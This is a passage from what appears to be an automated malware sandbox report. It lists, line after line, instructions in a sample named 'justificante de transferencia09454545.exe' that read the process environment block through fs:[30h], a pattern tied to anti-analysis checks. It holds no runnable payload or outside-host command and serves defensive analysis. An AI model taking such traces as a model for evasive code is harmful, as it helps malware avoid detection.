            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A372A0 mov eax, dword ptr fs:[00000030h]6_2_36A372A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A372A0 mov eax, dword ptr fs:[00000030h]6_2_36A372A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D329E mov eax, dword ptr fs:[00000030h]6_2_369D329E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D329E mov eax, dword ptr fs:[00000030h]6_2_369D329E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A292BC mov eax, dword ptr fs:[00000030h]6_2_36A292BC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A292BC mov eax, dword ptr fs:[00000030h]6_2_36A292BC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A292BC mov ecx, dword ptr fs:[00000030h]6_2_36A292BC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A292BC mov ecx, dword ptr fs:[00000030h]6_2_36A292BC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75283 mov eax, dword ptr fs:[00000030h]6_2_36A75283
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B52A0 mov eax, dword ptr fs:[00000030h]6_2_369B52A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B52A0 mov eax, dword ptr fs:[00000030h]6_2_369B52A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B52A0 mov eax, dword ptr fs:[00000030h]6_2_369B52A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B52A0 mov eax, dword ptr fs:[00000030h]6_2_369B52A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A752E2 mov eax, dword ptr fs:[00000030h]6_2_36A752E2
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A512ED mov eax, dword ptr fs:[00000030h]6_2_36A512ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B2D3 mov eax, dword ptr fs:[00000030h]6_2_3699B2D3
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B2D3 mov eax, dword ptr fs:[00000030h]6_2_3699B2D3
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B2D3 mov eax, dword ptr fs:[00000030h]6_2_3699B2D3
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF2D0 mov eax, dword ptr fs:[00000030h]6_2_369CF2D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF2D0 mov eax, dword ptr fs:[00000030h]6_2_369CF2D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B2F0 mov eax, dword ptr fs:[00000030h]6_2_36A4B2F0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B2F0 mov eax, dword ptr fs:[00000030h]6_2_36A4B2F0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB2C0 mov eax, dword ptr fs:[00000030h]6_2_369CB2C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F2F8 mov eax, dword ptr fs:[00000030h]6_2_36A5F2F8
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A92C5 mov eax, dword ptr fs:[00000030h]6_2_369A92C5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A92C5 mov eax, dword ptr fs:[00000030h]6_2_369A92C5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369992FF mov eax, dword ptr fs:[00000030h]6_2_369992FF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75227 mov eax, dword ptr fs:[00000030h]6_2_36A75227
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D7208 mov eax, dword ptr fs:[00000030h]6_2_369D7208
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D7208 mov eax, dword ptr fs:[00000030h]6_2_369D7208
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6D26B mov eax, dword ptr fs:[00000030h]6_2_36A6D26B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6D26B mov eax, dword ptr fs:[00000030h]6_2_36A6D26B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D724D mov eax, dword ptr fs:[00000030h]6_2_369D724D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999240 mov eax, dword ptr fs:[00000030h]6_2_36999240
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999240 mov eax, dword ptr fs:[00000030h]6_2_36999240
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C9274 mov eax, dword ptr fs:[00000030h]6_2_369C9274
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E1270 mov eax, dword ptr fs:[00000030h]6_2_369E1270
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E1270 mov eax, dword ptr fs:[00000030h]6_2_369E1270
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2D250 mov ecx, dword ptr fs:[00000030h]6_2_36A2D250
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5B256 mov eax, dword ptr fs:[00000030h]6_2_36A5B256
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5B256 mov eax, dword ptr fs:[00000030h]6_2_36A5B256
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369F739A mov eax, dword ptr fs:[00000030h]6_2_369F739A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369F739A mov eax, dword ptr fs:[00000030h]6_2_369F739A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A413B9 mov eax, dword ptr fs:[00000030h]6_2_36A413B9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A413B9 mov eax, dword ptr fs:[00000030h]6_2_36A413B9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A413B9 mov eax, dword ptr fs:[00000030h]6_2_36A413B9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C33A5 mov eax, dword ptr fs:[00000030h]6_2_369C33A5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A7539D mov eax, dword ptr fs:[00000030h]6_2_36A7539D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D33A0 mov eax, dword ptr fs:[00000030h]6_2_369D33A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D33A0 mov eax, dword ptr fs:[00000030h]6_2_369D33A0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F3E6 mov eax, dword ptr fs:[00000030h]6_2_36A5F3E6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A753FC mov eax, dword ptr fs:[00000030h]6_2_36A753FC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5B3D0 mov ecx, dword ptr fs:[00000030h]6_2_36A5B3D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6132D mov eax, dword ptr fs:[00000030h]6_2_36A6132D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6132D mov eax, dword ptr fs:[00000030h]6_2_36A6132D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36997330 mov eax, dword ptr fs:[00000030h]6_2_36997330
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2930B mov eax, dword ptr fs:[00000030h]6_2_36A2930B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2930B mov eax, dword ptr fs:[00000030h]6_2_36A2930B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2930B mov eax, dword ptr fs:[00000030h]6_2_36A2930B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF32A mov eax, dword ptr fs:[00000030h]6_2_369CF32A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F367 mov eax, dword ptr fs:[00000030h]6_2_36A5F367
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999353 mov eax, dword ptr fs:[00000030h]6_2_36999353
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999353 mov eax, dword ptr fs:[00000030h]6_2_36999353
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A43370 mov eax, dword ptr fs:[00000030h]6_2_36A43370
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699D34C mov eax, dword ptr fs:[00000030h]6_2_3699D34C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699D34C mov eax, dword ptr fs:[00000030h]6_2_3699D34C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75341 mov eax, dword ptr fs:[00000030h]6_2_36A75341
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A7370 mov eax, dword ptr fs:[00000030h]6_2_369A7370
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A7370 mov eax, dword ptr fs:[00000030h]6_2_369A7370
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A7370 mov eax, dword ptr fs:[00000030h]6_2_369A7370
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D909C mov eax, dword ptr fs:[00000030h]6_2_369D909C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A5096 mov eax, dword ptr fs:[00000030h]6_2_369A5096
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CD090 mov eax, dword ptr fs:[00000030h]6_2_369CD090
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CD090 mov eax, dword ptr fs:[00000030h]6_2_369CD090
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699D08D mov eax, dword ptr fs:[00000030h]6_2_3699D08D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2D080 mov eax, dword ptr fs:[00000030h]6_2_36A2D080
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2D080 mov eax, dword ptr fs:[00000030h]6_2_36A2D080
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C90DB mov eax, dword ptr fs:[00000030h]6_2_369C90DB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov ecx, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov ecx, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov ecx, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov ecx, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B70C0 mov eax, dword ptr fs:[00000030h]6_2_369B70C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A1D0C0 mov eax, dword ptr fs:[00000030h]6_2_36A1D0C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A1D0C0 mov eax, dword ptr fs:[00000030h]6_2_36A1D0C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C50E4 mov eax, dword ptr fs:[00000030h]6_2_369C50E4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C50E4 mov ecx, dword ptr fs:[00000030h]6_2_369C50E4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A750D9 mov eax, dword ptr fs:[00000030h]6_2_36A750D9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6903E mov eax, dword ptr fs:[00000030h]6_2_36A6903E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6903E mov eax, dword ptr fs:[00000030h]6_2_36A6903E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6903E mov eax, dword ptr fs:[00000030h]6_2_36A6903E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6903E mov eax, dword ptr fs:[00000030h]6_2_36A6903E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75060 mov eax, dword ptr fs:[00000030h]6_2_36A75060
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2106E mov eax, dword ptr fs:[00000030h]6_2_36A2106E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CB052 mov eax, dword ptr fs:[00000030h]6_2_369CB052
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A1D070 mov ecx, dword ptr fs:[00000030h]6_2_36A1D070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov ecx, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1070 mov eax, dword ptr fs:[00000030h]6_2_369B1070
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4705E mov ebx, dword ptr fs:[00000030h]6_2_36A4705E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4705E mov eax, dword ptr fs:[00000030h]6_2_36A4705E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A511A4 mov eax, dword ptr fs:[00000030h]6_2_36A511A4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A511A4 mov eax, dword ptr fs:[00000030h]6_2_36A511A4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A511A4 mov eax, dword ptr fs:[00000030h]6_2_36A511A4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A511A4 mov eax, dword ptr fs:[00000030h]6_2_36A511A4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369F7190 mov eax, dword ptr fs:[00000030h]6_2_369F7190
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A55180 mov eax, dword ptr fs:[00000030h]6_2_36A55180
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A55180 mov eax, dword ptr fs:[00000030h]6_2_36A55180
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BB1B0 mov eax, dword ptr fs:[00000030h]6_2_369BB1B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DD1D0 mov eax, dword ptr fs:[00000030h]6_2_369DD1D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DD1D0 mov ecx, dword ptr fs:[00000030h]6_2_369DD1D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A471F9 mov esi, dword ptr fs:[00000030h]6_2_36A471F9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A751CB mov eax, dword ptr fs:[00000030h]6_2_36A751CB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C51EF mov eax, dword ptr fs:[00000030h]6_2_369C51EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A51ED mov eax, dword ptr fs:[00000030h]6_2_369A51ED
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A77120 mov eax, dword ptr fs:[00000030h]6_2_36A77120
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1131 mov eax, dword ptr fs:[00000030h]6_2_369A1131
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1131 mov eax, dword ptr fs:[00000030h]6_2_369A1131
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B136 mov eax, dword ptr fs:[00000030h]6_2_3699B136
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B136 mov eax, dword ptr fs:[00000030h]6_2_3699B136
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B136 mov eax, dword ptr fs:[00000030h]6_2_3699B136
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B136 mov eax, dword ptr fs:[00000030h]6_2_3699B136
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A7152 mov eax, dword ptr fs:[00000030h]6_2_369A7152
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999148 mov eax, dword ptr fs:[00000030h]6_2_36999148
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999148 mov eax, dword ptr fs:[00000030h]6_2_36999148
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999148 mov eax, dword ptr fs:[00000030h]6_2_36999148
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999148 mov eax, dword ptr fs:[00000030h]6_2_36999148
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A39179 mov eax, dword ptr fs:[00000030h]6_2_36A39179
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A33140 mov eax, dword ptr fs:[00000030h]6_2_36A33140
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A33140 mov eax, dword ptr fs:[00000030h]6_2_36A33140
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A33140 mov eax, dword ptr fs:[00000030h]6_2_36A33140
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
